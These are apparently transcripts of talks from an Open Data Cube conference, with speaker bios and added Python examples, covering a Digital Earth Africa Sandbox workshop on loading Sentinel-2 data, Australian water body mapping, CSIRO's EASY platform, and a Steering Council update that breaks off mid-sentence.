Thank you so much for joining. We might give it a few minutes just to make sure everybody's online but I'm really happy to see all of you so far. I hope you were either able to attend the session already or that you're planning to attend some upcoming sessions if they're in a better time zone for you. I certainly know it's a bit earlier in the day on the other side of the world from Australia where I am. So I appreciate you all coming along. So yeah, I'll give it another like minute or two but then we'll get started. If you're keen to chat or feel like you want to introduce yourself feel free to put in the chat who you are and where you're joining us from. I'd love to see the different diversity and global representation that we've got going on. Thanks Alex for starting off the chat. Thank you. That's wonderful. We've got people from all over the world. I'm so excited. It's my absolute pleasure to be running this session with you and my hope is that at the end of the session you'll be a little bit more familiar with doing some programming with an open data cube implementation specifically for Digital Earth Africa. So we seem to be doing pretty well for people in which case I might get started. So I'm going to share my screen and just present a few slides to sort of introduce you to the workshop and a little bit of background. So thank you so much for coming along. It's really great that you're here, that you're participating in the conference and that you've taken this opportunity to get to learn a little bit more about how we can, you know, how you could use the open data cube to analyze satellite imagery. We're going to specifically be working with one of our open sandbox platforms. I did send around an email earlier if you had pre-registered for this session with some instructions for signing up but if you haven't yet don't worry at all we'll cover that as part of the 30 minute session that you have for working in a small group. So for this particular tutorial I'm just going to give you a little bit of background. I'm going to do a live demonstration of how to load. We're going to have 30 minutes to work through a tutorial again which I sent around earlier but again I will share with you when we get there. So if you're new to the open data cube I wanted to start by talking about the fact that it's a piece of open source software that's there to help you catalog and query specifically raster data. So images that come out of satellites it's really great for that. And what it really is doing is that it's providing a method for you to say here's where my data is located and here's how it's sort of sorted in time and here's where it is on my file system. And then what that means is that you can query that database to just pull out the pixels and the imagery that you actually need and want to analyze and that's what the open data cube enables you to do. So this is sort of well explained by these components so we have the open data cube as a whole but it's sort of split into you know where the data is sitting and those are the actual you know let's say geotiff files. Then there's the infrastructure which is what's interfacing between the data and also the applications which is how you're going to access the data. So when we set up open data cubes we have to build this index database that says here's where all my data lives either it lives in the cloud on s3 or it might live on your native file system. 
And once you've done that indexing you can then use these sort of various apps like Jupyter notebooks or web services to go and access the data that you need. But the indexing is pretty hard, and so what we're going to do today is use an implementation of the open data cube that already has that index set up, specifically over all of Africa. And for this implementation we're going to use Jupyter notebooks, so this is an environment where you can write Python code section by section and see your results as you go. So I'm going to show you a little bit of what that looks like. Like I said, doing the indexing is the hard part of the open data cube, and the reason these sandboxes are great (we not only have one for Digital Earth Africa but one for Digital Earth Australia as well) is that the data is already there and you can just work straight with the open data cube like an API to work with the data. The other thing that's great about the sandboxes, as you might notice in the picture, is they actually come with a whole bunch of reference notebooks, such as the beginner's guide, that you can use to learn about how to actually achieve certain things in the open data cube, such as loading data or plotting it. So the goals for this workshop: you're going to find an area that looks interesting to you somewhere in Africa, load a little bit of data for it (we won't load too much, just because you only have a little bit of time and sometimes the loading can take a while) and then see if you can visualize it using the sort of standard RGB (red, green, blue) imagery plot. If you are feeling ambitious there's a stretch goal where you can take this data and calculate a satellite imagery band index, so this might be something like the normalised difference vegetation index, which might tell you about the health of the different crops in these fields. So I'm going to jump in now to doing a live demonstration. Here's the Digital Earth Africa Sandbox; I've already logged in. You can see here these existing folders that are really useful, and this is how we create a new notebook. So I'm going to rename my notebook and call it ODC workshop. The great thing is that this sandbox is your space: when you leave and log back in, anything you put in here is unique to you. You have a copy of all these standard notebooks, but you can copy them and edit them as you desire and just make your own notebooks. So now that we've got this, I'm actually going to need to pick an area that we want to start with. One of the easiest ways to do this is the Digital Earth Africa Maps interface, and the reason I really like this is that you get a really clear visual of the whole continent, you can easily look at where data is available, and you can get the information that you're going to need in order to load it in your data cube. One of the nice features, I think, is that you can directly search. So this is the place I've searched for. I've zoomed in a little bit; at the moment this is just a sort of background imagery setting, but once that loads in I'm going to be able to use this as a sort of guide to find something interesting that I want to look at. So here I'm going to look at these irrigated fields. Okay, so the thing I can do now that's really helpful is that by clicking somewhere on the map I can actually get some latitude and longitude coordinates, and these are what I'm going to have to use to load my data.
So what I'm actually going to do is copy those, and in my notebook I'm going to change this (this is called a cell): I'm going to change it to markdown, and this means I'll have plain text here that I can get back to later. If I press shift enter, that actually just renders this plain text, so this is really good for keeping notes of things I'm going to need. So I'm actually going to make a note that when I did that click I was sort of in the bottom left corner of where I want to look, so I'm going to say bottom left are these coordinates. Perfect, so I can get rid of that, and now I can click up here, so that's going to be the top right; again I'm just going to copy those coordinates and pop them into here, so that is the top right. Awesome. And I do want to mention that, as part of that PDF that you'll work through for most of the session, I have instructions for you to follow for all of these steps, so there's no need to follow along live with me as I do this; feel free to just pay attention and understand the different components that are involved in actually going and loading data. So now that I know whereabouts I want to load some data, I'm just going to put a break in there so I can see them a bit more clearly. I can come back to my map and start exploring what data Digital Earth Africa has available. There's a big explore map data button here and everything's nicely cataloged, so I'm going to look in satellite images; I want to look at surface reflectance, so that's what our earth looks like, and again this is analysis ready data so it's going to be straight away ready for us to work with. I want to have a look at changes on the order of months, so I'm going to go for the daily surface reflectance data rather than looking at the annual. I'm also going to look at Sentinel-2 specifically, because it's got that higher resolution and faster revisit time. When I click that product in the DE Africa Maps interface I get this really good, detailed information about the product; this is really worth reading if you're not familiar with these products, but right at the bottom there's a piece of information I really need for the sandbox, and this is what's called the layer name. So I'm going to copy that; here it says s2_l2a, and that stands for Sentinel-2 Level 2A, so that's the analysis ready data. So I'm going to come back to my notebook, double click that cell to edit it, and I'm just going to make a note that says the Sentinel-2 product name is this. Oh, you can directly add that data to the map, and there's another good feature that will let you specifically filter by location. Because Sentinel-2 passes over different parts of Africa each day, you won't always see satellite imagery in the location that you're looking at every day; however, if I change it to filter by location you can really see the real imagery that was captured on these days, so that can be a really nice heads up of, you know, are you looking at the data you actually want to analyze. So for me I'm pretty happy with this, so now I can actually get started. Now that I have this information that I'm going to need, one of the best things you can do to help yourself is to go and look at the beginner's guide and look through the different notebooks we have for doing things, so I'm going to open the loading data notebook as a reference for myself and just close this a little bit. I love JupyterLab because I can just stick this notebook over here as a reference and I
can keep working in my own notebook. These notebooks have lots and lots of detail and they're really great as a reference guide. One of the first things you can see is that when we're working with the open data cube you need to import the open data cube Python package, so that's going to give you access to all the API, and you need to set up an object that's actually your connection to the Digital Earth Africa data cube. So I'm going to start by typing import datacube, and you can see some of the color has come up because I'm actually working in a code cell. When I press shift enter that's all good; this one on the side here means that that's finished running. Then, in order to connect to the data cube, I'm going to call my data cube object dc, and the way that you create it is you write datacube.Datacube, so that's the Datacube object from the datacube library. We tend to give it an app name, and that's just to help us understand all the different people that are using the data cube, but really we can call it anything, so I'm going to call it my notebook, and then that's enough to connect it. This deprecation warning is coming up but it's not something we need to be worried about; sometimes when things come up in red they might just be a warning, and it's always worth having a read of them. Okay, so I'm now looking at how to load data using dc.load specifically. It will require at a minimum a product, so this is actually our Sentinel-2 Level 2A product; it requires the area I want to load in my x dimension, the area I want to load in the y dimension, and the time span over which I want to load it, and it tells you a little bit about the format you need to provide there. So what I'm going to do, before I actually construct that load, is turn the data I collected into something that's a little bit more useful. Something that's great that I can do in Python is I can actually set up variables that mean something to me. So what I'm doing here is I'm typing bottom and left, so these are two variables, and here I'm going to just copy the latitude and longitude values that I collected earlier. I know that that one is the bottom because it corresponds to degrees north, and I know that this one is the left because it's degrees east, and what that will do is, when I evaluate that cell, this will say bottom is equal to 30.2 and left is equal to 30.5, obviously with the extra decimal places. I can do this again for the top and the right: equals, and then again I'm going to use a bracket (this is called a tuple in Python) and I'm going to copy and paste my coordinates straight in there. Okay, so I'm going to say that my data product is equal to s2_l2a; I'm using quotes here because I need to pass this in as a string, so a word rather than a number. And finally, the thing I hadn't decided is that I need to pick a start and an end date, so I'm going to create a new variable, start date, and it's equal to 2020, January, and the first; again you pass this in as a string, and you can see that that information is available in the loading data notebook. I'm just going to load two months' worth of data, just because I don't want us to be here too long, and Sentinel-2 has data every three to five days, so two months should give me a reasonable amount of data to look at.
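For readers following along outside the live session, here is a minimal sketch of the set-up steps just described, assuming the Digital Earth Africa Sandbox, where the datacube package and the index are already provided. The coordinates and dates are illustrative placeholders, close to but not exactly the values used in the demonstration.

```python
# Minimal sketch of the set-up described above, assuming the Digital Earth Africa
# Sandbox, where the datacube package is pre-installed and the index already exists.
# The coordinates and dates below are illustrative placeholders.
import datacube

# Connect to the data cube; the app name is just a label used for usage tracking
dc = datacube.Datacube(app="my_notebook")

# Corners of the study area, collected by clicking on the DE Africa Maps interface
bottom, left = (30.20, 30.50)   # bottom-left corner (degrees north, degrees east)
top, right = (30.25, 30.55)     # top-right corner (degrees north, degrees east)

# Product and time range to load
data_product = "s2_l2a"                             # Sentinel-2 Level 2A analysis ready data
start_date, end_date = "2020-01-01", "2020-02-29"   # two months of data
```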
So when I press shift enter these variables are all assigned; if I type one of them and hit shift enter, you can see that Python will print out for me the value that's actually assigned to it, so that's a good way to check if things are working the way you expect. I'm just going to cut that cell because I don't need it anymore. Fantastic, now we can start learning how to load data. This is an example for the geomedian Sentinel-2 product; I'm going to use that as a basis and I'm going to add a couple of other things that have to do with loading Sentinel-2. I'll need to assign my loaded data to a variable, so I'm going to call that ds, which stands for data set. You could really call this anything: you could say sentinel_2, you could say, you know, march_dataset, or anything you want to call it is fine; we tend to use ds, and ds with underscores, to kind of indicate that they're a dataset. So here I'm using this dc object that we made earlier, that's my data cube, and I'm asking it to load, and from here I'm going to start inputting the information I need. There's an argument called product, and I'm going to say that that's equal to my variable data product, which is the Sentinel-2 Level 2A. Then I'm going to say that my x is equal to left comma right and my y is equal to, and it doesn't really matter I don't think whether you go top or bottom or bottom or top, but I'm going to go top and bottom, and then finally I'm going to also put in time equals start date and end date. You could also copy, you know, these numbers and these strings straight into here like they are in this example; I like using variables because you could come and edit this later if you wanted to change them. Another thing you'll see here is you need to specify which measurements you want; these are the sort of satellite imagery bands. So measurements equals, and for that we provide Python lists, so that's with the square brackets, so we use blue, green, red, and I'm also going to load near infrared, so that's nir. Finally there's a little extra bit that's required: if I actually try and run this it will give me an error, and that's because this product doesn't actually have a default coordinate reference system, so it's telling me I have to specify the output CRS and the resolution as part of my query. So I'm going to come back up to my query and just add another line. Here's the output CRS: I'm going to use EPSG:6933, which for Sentinel-2 is going to give me something back in meters. And then it also said I needed to specify the resolution, so in this case what I'm going to write is negative 10 comma 10, and what that's saying is that each pixel is 10 meters, and it's just providing the information that the y pixels go down in space, that they go top to bottom instead of bottom to top, which is something it needs; there is some more information about that in this document if you want to look at it. See how this has a little asterisk: that means it's loading, which is good. It does take a few seconds; I'm just double checking I didn't accidentally load a huge amount of data, but it's done, which is great. So when I showed you before that you can just type in a variable and see what it looks like, we can do the same thing with our loaded dataset, and what we actually get is something called an xarray Dataset. What this tells you is that the data I've loaded actually has three dimensions: I've got 24 time steps, 656 x pixels and 414 y pixels, and it tells me the variables I loaded. So I could just look at one of those directly: if I type ds.red,
that's showing me the actual surface reflectance values that are sitting in there. So that's the introduction so far. I would highly recommend that you also have a look at the plotting notebooks and the basic analysis notebooks as you are working through the PDF we supplied to you, in the breakout rooms. So I'm going to stop sharing for the moment, and now it is your turn. What's going to happen now is that for the next half an hour you're going to be assigned to a breakout room, either with me or Andrew Hicks or Ife Chong or Alex Leith, and we'll be there to answer your questions if you get stuck working through the tutorial. The link to the tutorial I'm going to post in the chat here, but each of your facilitators can post it to you again if you don't have it. So yeah, please feel free to just open the PDF and start working through it; your facilitators are there if you have questions or you want to know how to do something different, and after half an hour we'll all come back in here just to wrap up. I hope you enjoy the workshop and get to learn some things about loading and manipulating data. So Roshni, if you can open the breakout rooms that'd be great. You might see your screen disappear as Roshni does this, but it will come back in a moment when you're loaded into the breakout room. So have a great time, thanks!
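To summarise the live demonstration and the stretch goal in code form, here is a minimal sketch assuming the variables defined above (dc, data_product, the corner coordinates and the dates). The plotting uses plain xarray rather than the Sandbox's own plotting helpers, and the NDVI calculation is the standard formula; treat it as an illustration rather than the exact notebook from the session.

```python
# Minimal sketch of the load, RGB visualisation and NDVI stretch goal described in
# this workshop, assuming dc, data_product, the corner coordinates and the dates
# defined earlier. Plotting here uses plain xarray; the Sandbox notebooks also
# provide their own plotting helpers, which are not used in this sketch.
ds = dc.load(
    product=data_product,
    x=(left, right),
    y=(top, bottom),
    time=(start_date, end_date),
    measurements=["blue", "green", "red", "nir"],
    output_crs="EPSG:6933",   # required: this product has no default CRS
    resolution=(-10, 10),     # 10 m pixels; negative y because rows run top to bottom
)
print(ds)                     # an xarray Dataset with time, y and x dimensions

# RGB plot of the first timestep (robust=True stretches the colour scale)
rgb_first = ds[["red", "green", "blue"]].isel(time=0).to_array()
rgb_first.plot.imshow(rgb="variable", robust=True)

# Stretch goal: normalised difference vegetation index (NDVI).
# Convert to float first so the integer reflectance values do not overflow.
nir = ds.nir.astype("float32")
red = ds.red.astype("float32")
ndvi = (nir - red) / (nir + red)
ndvi.isel(time=0).plot(cmap="RdYlGn", vmin=-1, vmax=1)
```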
This workshop is designed to provide an introduction and demonstration of how to load data and manipulate it in the Digital Earth Africa Sandbox environment. We'll use this environment as there is no installation required and data is already available. The workshop is designed for people who are new to programming or new to ODC. Please see the accompanying documentation for this workshop to follow through here: https://gist.github.com/caitlinadams/93eccb5bddef8423459ea74498db6d62
10.5446/54373 (DOI)
Thank you very much for the opportunity to present today. I'm going to show you some of the great work that we're doing in Digital Earth Australia, making use of the open data cube to answer questions, particularly around water across the Australian landscape. So we've got petabytes of satellite information across Australia and what we've done with our open data cube instance in Digital Earth Australia is fill it with analysis ready data. So analysis ready data is a really important concept for what we've been able to do with Digital Earth Australia because it means that all of the satellite imagery is pre-processed. All of the imagery has been ortho rectified, so all of the kind of wiggles of the direction of the capture have been sorted out, it's been calibrated and it's been turned into a time series so that we can look at every individual pixel and know that we can analyse them through time and the imagery has been corrected enabling us to do that using the open data cube technology. So we have petabytes of data across all of Australia going back since 1987, every 16 days or so and there's literally infinite ways that we can analyse that information and so our job here is to turn that data into something that's actually useful and what you see in the background here is a bit of a buff of imagery that has been produced various ways that you can actually go about visualising the information, making use of the open data cube so that we can pre-process and automate the processing of those data sets. So the really big question becomes not so much of what can we do but why, what are we actually wanting to find out, what are the big questions that we're trying to answer and so I'm just going to walk you through just a couple of case studies that go through some of those questions that we've been able to answer making use of open data cube technology. So the first question that we were asked by some of our stakeholders was okay you've got access to this satellite archive, can you use it to tell us where water bodies are across particularly the Murray Darling Basin and how the water in them is changing over time. So this was a question posed by a stakeholder wanting to make use of satellite imagery to supplement the information that they already had in this area. So for those of you not in Australia the Murray Darling Basin is a very large inland catchment, it covers a huge portion of the continent so if you can imagine the size of Australia we're looking at something about a fifth of the size of the continent and we have huge amount of agricultural production in this area so it's a really important area to be able to understand. It's also out quite remote so there's the settlements throughout but there are big areas where there's really not a lot of people going out there regularly so making use of satellite information to understand what's happening in these areas is a really important opportunity. So we have a product that we've produced called Water Observations from Space and what it does is it takes the complete archive of satellite imagery and compresses it down into a layer that basically tells you how frequently water is observed in every pixel across the entire Australian continent. So I've taken a small snapshot of that archive here and what you get is this beautiful image of a lake system in kind of the arid northern part of Australia and the colours that you're seeing here will tell you how frequently water is observed. 
So where you can see red colours, yellow colours, we're seeing water in only about sort of one to five percent of total observations. Through the green spectrum into the blue colours we're starting to see water occur more frequently and what this allows us to do is build up a really clear picture of how water is moving through the landscape, how frequently we can expect it in different locations. And this is a really valuable data set but we want to be able to look at a lake. Pixels are really useful for being able to do individual kind of small scale analyses but we don't really care about how all of the individual pixels in the lake are doing, we actually want to look at the lake as a whole. So we've developed a product that turns that raster data set into a vector data set which basically means we've just taken it, drawn a big line around it and looked at them as a series of objects. So rather than a hundred pixels that make up a lake, you now have one lake object. And across Australia we were able to do this using Python scripts and the open data cube so that we can automate the detection of those lake systems and we mapped about 300,000 water bodies across the entire continent using that methodology. For every single one of those water bodies we've been looked at the individual satellite observations that have been collected for each water body and looked at how the surface area of water inside of those individual objects has changed over time. So here as an example we've got a pretend lake in our red box and in our first time step with satellites passed overhead and we can see that it's all blue. So we're seeing water across the entire surface area of that lake. Time B we're looking at about a 40% coverage of water and C only a 5%. And if you take those 300,000 water bodies and you do this for every single one of them for every single satellite observation, what you get back is a really rich time history of how each individual water body has changed over time. And here's just one example of that. This is a lake system just outside of Canberra where we are. And you can see that we've made this information publicly available. It's in a website. You can go into that website and you can access this information, click on any water body and you get back on the bottom is a time history of that changing percentage of surface area. So this product was developed based off the requirements of a stakeholder and making use of the kind of tool set that comes with the open data cube. So we're also able to answer other questions. One of the other questions we have addressed or started to address is particularly in that part of Australia, we have a lot of very dry locations and we have people grazing stock out there. And so we've made use of this information to answer the question, how much surface water is available for stock? And every single month we produce a map like this with our collaborators in the New South Wales state government. And what it does is it takes the latest satellite observations across the state and it tells you how much water compared to how much water could be there if every single one of those water bodies was completely covered in water. How much water is there actually now? And this has been a really powerful tool to help agricultural managers understand the availability of surface water across the state. And the final case study I wanted to share was, okay, so we know that we can map water, we can do that in a reasonably quick time frame. 
What about a use case where we really need to have information fast? So if you're a firefighter and a fire has just broken out, can we tell you where the closest open water is to that fire ground? This is some prototyping work that we're doing at the moment; we're in the process of producing an operational system that does this. In this map you can see the red, yellow and orange are hot spots. They're areas that have been detected as anomalously warm, and in this location that corresponds to a fire. The red ones are the most recent observations, through to yellow, the oldest. What we've done here is just intersect this information with the water bodies data set, so that we can get an understanding of the water bodies that have had observed water in them in the last 30 days within a certain distance of the fire ground. And in reality what that actually looks like is something like this. We've got some flight paths added into our map in the background, and what you can see is the water bodies that these particular aircraft have gone to to collect water to fight the fire at this fire ground. This is a really important piece of information, because not only do they need to know that there is water available there, they also need to know the characteristics of that water. Because if you've got a helicopter, you can get water from a swimming pool. But if you've got a fixed wing aircraft that you're using for firefighting, you need to know that the water body is of a certain size so that the plane has time to get in and get out again. So we're working with stakeholders to answer all sorts of questions across Australia, and I've just chucked a bunch of them in here. Basically the key takeaway message is that we have so much information available across Australia because of the richness of the Landsat archive that we have, and the Sentinel data that's now being collected as well. And so the big thing that we have to do is speak with our stakeholders and understand what questions it is that they want to actually answer using the data and how we can go about supporting that. And we've really been able to provide some new insights that have allowed for enhanced decision-making capability using satellite information that wouldn't have been available if it wasn't for the ability to do that bulk, large scale processing using the open data cube technologies. So thank you very much.
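As a rough illustration of the raster-to-vector step and the per-water-body time series described in this talk, here is a minimal sketch. It is not the Digital Earth Australia production workflow: the inputs (a boolean "frequently wet" mask, its transform and CRS, and a 3D boolean water classification), the helper names and the simple wet-fraction measure are all assumptions made for the example.

```python
# Minimal sketch of the idea described in this talk: polygonise pixels that are
# frequently wet into water-body objects, then track the wet fraction inside one
# object through time. Not the DEA production code; `wet_mask`, `transform`, `crs`
# and `water` (a time/y/x boolean xarray DataArray) are assumed inputs, and the
# polygon must be in the same CRS as the raster.
import numpy as np
import geopandas as gpd
import xarray as xr
from rasterio import features
from shapely.geometry import shape


def waterbody_polygons(wet_mask: np.ndarray, transform, crs) -> gpd.GeoDataFrame:
    """Turn a boolean 'frequently wet' mask into one polygon per water body."""
    polygons = [
        shape(geom)
        for geom, value in features.shapes(wet_mask.astype(np.uint8), transform=transform)
        if value == 1  # keep only the wet regions, not the background
    ]
    return gpd.GeoDataFrame(geometry=polygons, crs=crs)


def wet_fraction_timeseries(water: xr.DataArray, polygon, transform) -> xr.DataArray:
    """Fraction of pixels inside `polygon` that are wet at each timestep."""
    inside = features.geometry_mask(
        [polygon], out_shape=water.shape[1:], transform=transform, invert=True
    )
    mask = xr.DataArray(inside, dims=water.dims[1:])
    # Pixels outside the polygon become NaN, so the mean over y/x is the wet fraction
    return water.where(mask).mean(dim=water.dims[1:], skipna=True)
```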
Claire Krause is the Assistant Director of Product Development in Digital Earth Australia; Geoscience Australia’s satellite imagery program. She is responsible for working with stakeholders to develop ideas and workflows for using our wealth of satellite information to better inform decision makers on Australia’s natural resources, with a particular focus on water.
10.5446/54376 (DOI)
Hi, I'm Dr. Robert Woodcock and it's great to be with you today at the Open Data Cube Conference. I'd like to give you a bit of an overview of the impact the Open Data Cube has had at the CSIRO and with our many clients and collaborators in our work in the Earth observation. We'll begin by having a look at the Earth Analytics at CSIRO and the diversity of use cases and technologies that are involved and also our Earth Analytics Science Innovation Hub and how we're using that and the Open Data Cube within it to really accelerate how we take our research outcomes and make them available to industry and government globally. Then we'll look specifically at the contributions that we make to the Open Data Cube community and we hope you're enjoying some of those and consider some of those in your future work. A brief overview of the easy data pipelines and also a look at really just how this is actually playing out for us with both our research and our public good deployments and also our commercial enterprise deployments and engagement we have using the Open Data Cube. So Earth observation at CSIRO is a big area. We have a few hundred researchers working in Earth observation or related fields. We not only do satellite data from the public data sets that you see globally like Sentinel and Landsat but we also make very heavy use of high resolution data acquired from satellites and also from airborne and UAV type data sets. We combine that also with field work. So we have sensors like a Hydrospector which is used for in situ sensors on ground for aquatic reflections and so forth and we combine those data sets together into our analytics codes to provide some of the best of breed water quality type algorithms, agricultural work. We have researchers in oceans, atmosphere, minerals and mining areas, urban researchers and so forth. So it's quite a broad area and creating an analytics platform that's capable of handling all of those is actually quite challenging given the variety of data and the variety of research that's being performed. As a result we have a system which we call EASY or the Earth Analytics Science and Innovation Hub. The core analytics are powered by Open Data Cube of course. That's one aspect of it that's very important for Earth observation work. We also make very good use of the Pangeo area or work which is primarily around climate and oceans type modeling type work. We have machine learning capabilities in the system and really just drawing on the Python scientific data ecosystem quite broadly. We use this environment EASY for really accelerating the transfer of the research outcomes that we're producing into use by large to small, medium enterprises, government and research organizations on a global scale. As a result we have EASY deployments in a number of regions around the world. Australia of course, the United States, Chile, Southeast Asia and we are providing EASY as a deployment option as a shared tendency for commercial subscribers and we have a couple of those as well as an enterprise secure environment for organizations that want their own system integrated fully within their enterprise. This type of engagement is enabling us to use EASY as a platform to conduct research with those organizations and then transfer that research outcome directly into use by that organization. The EASY itself as I mentioned is an ecosystem. It's not just Open Data Cube, it's a wide variety of systems across the Python tool suite. 
It has as a result a range of interfaces, and the point I wanted to make with this range of interfaces is that it is very common for our work to begin at the exploratory phase in JupyterLab and with direct Python coding using things like Visual Studio Code, which is also available through the EASY interfaces. Using that direct coding interface to do iterative analysis, in an environment that we know can be deployed and used directly with our clients, begins at that exploratory data analytics stage. It starts there; you can pick it up and then put it into a web application for on-the-fly creation of a product, or into a scalable production workflow for automated update. You can do the experiment and then you can transfer it into production, and the code is staying relatively the same all the way through, and that's really the power that we're getting from the EASY system. So, the capabilities of EASY: I mentioned Open Data Cube, clearly a part of it. Analysis ready data is clearly also very important. We apply this not only to Earth observation data but also to data coming from things like our HydraSpectra sensor for field measurements and in situ measurements, and having that flow into the system. Our users have in this environment their own space as well as shared project spaces. This is all handled and authenticated under attribute-based access control within the system, which is a key enterprise feature for the EASY system. We also have users with their own customizable Dask clusters, plural: users can actually have their own Dask clusters, multiple of them, and they can scale those up and down as required for the particular research workflow that they're undertaking. The actual platform will scale to thousands of cores. It may scale even higher; that's kind of the limit we've got to at the moment in terms of demand. We perform multi-sensor data integration very routinely, and so there is a variety of data, more than just Earth observation, in the system. The actual system itself is a Kubernetes cluster running on AWS. It's all managed through DevOps controls, tools like HashiCorp Terraform and Flux, and this has been a very important part of that automation of deployment. Without that, I doubt very much we could actually run this system; there are many thousands of moving parts across the multiple deployments. CSIRO itself contributes to the ODC in a number of areas. In particular, we're interested in things like the Zarr driver for Open Data Cube. That Zarr driver adds multi-dimensional support; for us, it's particularly important for handling hyperspectral satellite data, which is starting to be an increasing part of our work. We also have extensions for supporting LiDAR data from GEDI and a number of other satellites as part of our work, and we'll be contributing those components back into the Open Data Cube community as they come on board. We're also core contributors to the Kubernetes and Terraform environment, so feel free to reach out to us for assistance and advice in that area if you're interested in setting up a production Open Data Cube that scales. We also play a role in coordinating with the international space agencies, USGS Landsat, analysis ready data from Copernicus, etc.
It doesn't happen without influence, and both Geoscience Australia and CSIRO contribute directly to the Committee on Earth Observation Satellites in leadership roles, coordinating activities and ensuring that information systems and services across all the CEOS agencies are making more and more of the data available on the cloud and in an analysis-ready form for you to use. Another area we contribute to is, of course, science and applications outside of Data Cube core: some of the notebooks that you see kicking around in the Open Data Cube community have had contributions from CSIRO, and we work very closely with GA on a number of products as well. So all of this work on the Open Data Cube and the Earth Analytics Science Innovation Hub has had a tremendous impact on our research. We have several hundred users within CSIRO and a few dozen projects actually operating on EASY as a routine matter now, and that's in a pre-production phase. We're actually working with our corporate Enterprise IT group now to get it into a fully production environment with single sign-on across the whole of CSIRO, and we've also deployed this, as I mentioned, into multiple regions around the world, and we have commercial subscribers. So at the moment we're actually running seven production environments of EASY across the planet, with a very wide variety of data types coming through our data pipelines capability, and more are coming online as we speak. We're looking to do a lot more work around the enterprise features, particularly fine-grained access control on resources and controls on billing and costs within the system itself. And we're also looking for ways to make it easier to go from a notebook to a dashboard. So with that I'd like to say thank you very much for your time today, and I hope this has been a useful overview. If you'd like further information feel free to contact any of the members of our team. Thank you again, and I hope you enjoy the rest of the Open Data Cube conference.
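As a rough sketch of the per-user scaling pattern described in this talk, the snippet below assumes a Dask Gateway service (common in JupyterHub-on-Kubernetes deployments like the one described) and an existing Open Data Cube index. The product name, extent and chunk sizes are placeholders, not EASY-specific values.

```python
# Minimal sketch of the scale-out pattern described above, assuming a Dask Gateway
# service and an existing Open Data Cube index. The product name, extent and chunk
# sizes are placeholders only.
import datacube
from dask_gateway import Gateway

gateway = Gateway()                    # connect to the hub's Dask Gateway service
cluster = gateway.new_cluster()        # each user can create their own cluster(s)...
cluster.scale(20)                      # ...and scale workers up or down as needed
client = cluster.get_client()

dc = datacube.Datacube(app="dask-sketch")
ds = dc.load(
    product="ls8_sr",                              # placeholder product name
    x=(148.0, 149.0), y=(-36.0, -35.0),
    time=("2020-01-01", "2020-12-31"),
    output_crs="EPSG:3577", resolution=(-30, 30),
    dask_chunks={"time": 1, "x": 2048, "y": 2048}, # lazy, chunked load on the cluster
)
result = ds.mean(dim="time").compute()             # executed in parallel on the workers

cluster.shutdown()                                 # release the workers when done
```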
Dr Robert Woodcock is a Research Scientist and Consultant in Earth Data and Analytics infrastructures with CSIRO Minerals and CSIRO Space and Astronomy. Data and its conversion to useful, decision supporting information is a universal need for business, community, and Government across a broad range of areas from improving business operations through application in decision support at a national and international levels in earth resource, urban and environmental management. As our ability to gather data has grown exponentially, so has our need to manage the flow of information within and between organisations and to make it useful. Dr Woodcock and his teams have address the issues of information flow across organisational boundaries and have developed innovative information systems adopted into national infrastructure and achieved lasting large scale economic impact on multiple organisations. Dr Woodcock's portfolio of activities involves national spatial data infrastructure and CSIRO Earth Analytics Science Innovation Cloud platform. His team’s portfolio has seen national application in Australian Industry and Government including the AuScope national geoscience information infrastructure. Internationally, he is a member of the Committee on Earth Observation Satellites (CEOS) and Chair for the CEOS Working Group on Information Systems and Services. Robert has worked for almost two decades in the field of visualisation, spatial information systems and analytics and its application to Earth Science with a focus on ensuring research innovation leads to business innovation.
10.5446/54382 (DOI)
Hi everyone, my name is Caitlin Adams and it's my pleasure to be speaking to you today on behalf of the Open Data Cube Steering Council. I'm going to be telling you a little bit about what we do as a council and what we've got planned for our next projects. So I wanted to talk about the fact that the council exists to ensure the long-term well-being of the Open Data Cube project, and that's both in terms of the technology but also the broader community that makes that technology possible. We run monthly meetings where we discuss things like code architecture, event planning such as this conference, and how we can better support the community to do the development that makes the Open Data Cube such a great piece of open source software. If you, as part of your organisation, have been contributing to the Open Data Cube for a year, you can actually have a representative on the Steering Council. So if that's something you're interested in, feel free to talk to me or our previous Chair Alex Leith or our upcoming Chair, who I'll announce at the end. If you want to learn more about the governance, you can see that on our GitHub. So for most of this talk, I want to cover some of the highlights we've had from the past year. In terms of being an open source project, the Open Data Cube was recently awarded the status of OSGeo community project, and that's really important because it recognises the work that's been put into this project and helps us promote it. This was a process that was led by Alex Leith, who was our previous Chair of the Steering Council, and we'd really like to thank Bruce Bannerman and Joanie Garnett for their support as part of this process. We are looking to continue this work to go to full OSGeo project status, and that involves a full code licence audit. So something I think has been really cool in the past 12 months is how the Open Data Cube has progressed to allow the creation of continental scale products. There are two tools that we use for doing this: one is Alchemist and one is Statistician. The way that Statistician works is that it's there to summarise huge quantities of Earth observation data. A really good example is the Digital Earth Africa GeoMAD product, which condenses two petabytes of data into annual geomedians plus deviations. As an alternative, if you want to move beyond standard summary statistics, we also have the Alchemist tool, which Digital Earth Australia has used to make the Collection 3 Landsat derivative products such as Water Observations from Space and Fractional Cover. And you can see that these pipelines use huge numbers of processes and huge amounts of memory, but I think it's really amazing that the Open Data Cube can now process data on this sort of scale. If you're interested in interacting with data, particularly through Google Earth Engine, the CEOS Systems Engineering Office now has an Open Data Cube sandbox that's based out of Google Colab. This is a Jupyter notebook interface where you can log in for free and access Google Earth Engine data using all the sort of higher level APIs that you're familiar with from the Open Data Cube. You can try that out at openearthalliance.org slash sandbox. So we also have our Open Web Services, and this is what lets us look at Earth observation data in our browsers and other places where we can access the web.
So in the last 12 months there have been lots of highlights from this, including a much more regular and routinely tested automated release schedule, with updates every month. There have also been significant improvements to the user documentation, including multilingual metadata and how-to documentation for styling. And I think this is really great because it's actually now become a standalone API that you could use in something like a notebook, not just in the standard renderer. There are many, many more updates about that, which you can speak to Paul about if you're interested. So finally, I'd like to speak a little bit about ongoing projects. These are the things that we've been working on and will continue to work on into the future, so I definitely encourage you to speak to the people involved if it's something you'd like to use for your organization or in your own work. The first one is making sure that the open data cube can support multidimensional datasets. This is something being done by Peter Wang at CSIRO and is part of an Open Data Cube Enhancement Proposal; this is where you can talk to the council about things you want to contribute directly to the open data cube. This is allowing the open data cube to support not just spatial and temporal datasets, in terms of only having a sort of X and Y axis, but actually allowing support for an additional dimension or more. So for example, it could be the Z dimension, it could be a wavelength, it could be a height if you're working with LiDAR data, and the possibilities go on. It uses Zarr in order to do the 2D and 3D reading, and I think that this is going to be something that really helps the open data cube extend beyond just the sort of surface reflectance products that we're all really familiar with, into things like LiDAR and hyperspectral. The other thing that's 